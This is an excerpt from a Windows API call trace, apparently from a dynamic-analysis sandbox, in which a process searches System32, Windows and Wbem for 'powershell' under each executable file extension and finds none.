	[0560.957] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.958] SetErrorMode (uMode=0x1) returned 0x1
	[0560.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.958] SetErrorMode (uMode=0x1) returned 0x1
	[0560.958] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.958] SetErrorMode (uMode=0x1) returned 0x1
	[0560.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.959] SetErrorMode (uMode=0x1) returned 0x1
	[0560.959] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.959] SetErrorMode (uMode=0x1) returned 0x1
	[0560.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.959] SetErrorMode (uMode=0x1) returned 0x1
	[0560.960] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.960] SetErrorMode (uMode=0x1) returned 0x1
	[0560.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.960] SetErrorMode (uMode=0x1) returned 0x1
	[0560.960] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.961] SetErrorMode (uMode=0x1) returned 0x1
	[0560.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.961] SetErrorMode (uMode=0x1) returned 0x1
	[0560.961] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.961] SetErrorMode (uMode=0x1) returned 0x1
	[0560.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.962] SetErrorMode (uMode=0x1) returned 0x1
	[0560.962] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.962] SetErrorMode (uMode=0x1) returned 0x1
	[0560.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.962] SetErrorMode (uMode=0x1) returned 0x1
	[0560.962] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.963] SetErrorMode (uMode=0x1) returned 0x1
	[0560.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.963] SetErrorMode (uMode=0x1) returned 0x1
	[0560.963] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.963] SetErrorMode (uMode=0x1) returned 0x1
	[0560.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.964] SetErrorMode (uMode=0x1) returned 0x1
	[0560.964] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.964] SetErrorMode (uMode=0x1) returned 0x1
	[0560.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.965] SetErrorMode (uMode=0x1) returned 0x1
	[0560.965] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.965] SetErrorMode (uMode=0x1) returned 0x1
	[0560.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.965] SetErrorMode (uMode=0x1) returned 0x1
	[0560.966] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.966] SetErrorMode (uMode=0x1) returned 0x1
	[0560.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.966] SetErrorMode (uMode=0x1) returned 0x1
	[0560.966] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.966] SetErrorMode (uMode=0x1) returned 0x1
	[0560.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.967] SetErrorMode (uMode=0x1) returned 0x1
	[0560.967] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.967] SetErrorMode (uMode=0x1) returned 0x1
	[0560.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0560.968] SetErrorMode (uMode=0x1) returned 0x1
	[0560.968] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.968] SetErrorMode (uMode=0x1) returned 0x1
	[0560.968] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.968] SetErrorMode (uMode=0x1) returned 0x1
	[0560.968] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.969] SetErrorMode (uMode=0x1) returned 0x1
	[0560.969] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.969] SetErrorMode (uMode=0x1) returned 0x1
	[0560.969] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.969] SetErrorMode (uMode=0x1) returned 0x1
	[0560.970] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.970] SetErrorMode (uMode=0x1) returned 0x1
	[0560.970] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.970] SetErrorMode (uMode=0x1) returned 0x1
	[0560.970] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.970] SetErrorMode (uMode=0x1) returned 0x1
	[0560.970] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.971] SetErrorMode (uMode=0x1) returned 0x1
	[0560.971] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.971] SetErrorMode (uMode=0x1) returned 0x1
	[0560.971] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.971] SetErrorMode (uMode=0x1) returned 0x1
	[0560.972] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.972] SetErrorMode (uMode=0x1) returned 0x1
	[0560.972] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.972] SetErrorMode (uMode=0x1) returned 0x1
	[0560.972] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.972] SetErrorMode (uMode=0x1) returned 0x1
	[0560.973] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.973] SetErrorMode (uMode=0x1) returned 0x1
	[0560.973] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.973] SetErrorMode (uMode=0x1) returned 0x1
	[0560.973] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.973] SetErrorMode (uMode=0x1) returned 0x1
	[0560.974] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.974] SetErrorMode (uMode=0x1) returned 0x1
	[0560.974] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.974] SetErrorMode (uMode=0x1) returned 0x1
	[0560.974] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.975] SetErrorMode (uMode=0x1) returned 0x1
	[0560.975] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.975] SetErrorMode (uMode=0x1) returned 0x1
	[0560.975] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.975] SetErrorMode (uMode=0x1) returned 0x1
	[0560.975] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.976] SetErrorMode (uMode=0x1) returned 0x1
	[0560.976] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.976] SetErrorMode (uMode=0x1) returned 0x1
	[0560.976] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.976] SetErrorMode (uMode=0x1) returned 0x1
	[0560.977] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.977] SetErrorMode (uMode=0x1) returned 0x1
	[0560.977] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.977] SetErrorMode (uMode=0x1) returned 0x1
	[0560.977] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.977] SetErrorMode (uMode=0x1) returned 0x1
	[0560.978] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.978] SetErrorMode (uMode=0x1) returned 0x1
	[0560.978] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0560.978] SetErrorMode (uMode=0x1) returned 0x1
	[0560.978] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0560.979] SetErrorMode (uMode=0x1) returned 0x1
	[0560.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.027] SetErrorMode (uMode=0x1) returned 0x1
	[0561.028] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c95dd20 | out: lpFindFileData=0x1c95dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0561.028] SetErrorMode (uMode=0x1) returned 0x1
	[0561.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c95db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0561.028] SetErrorMode (uMode=0x1) returned 0x1
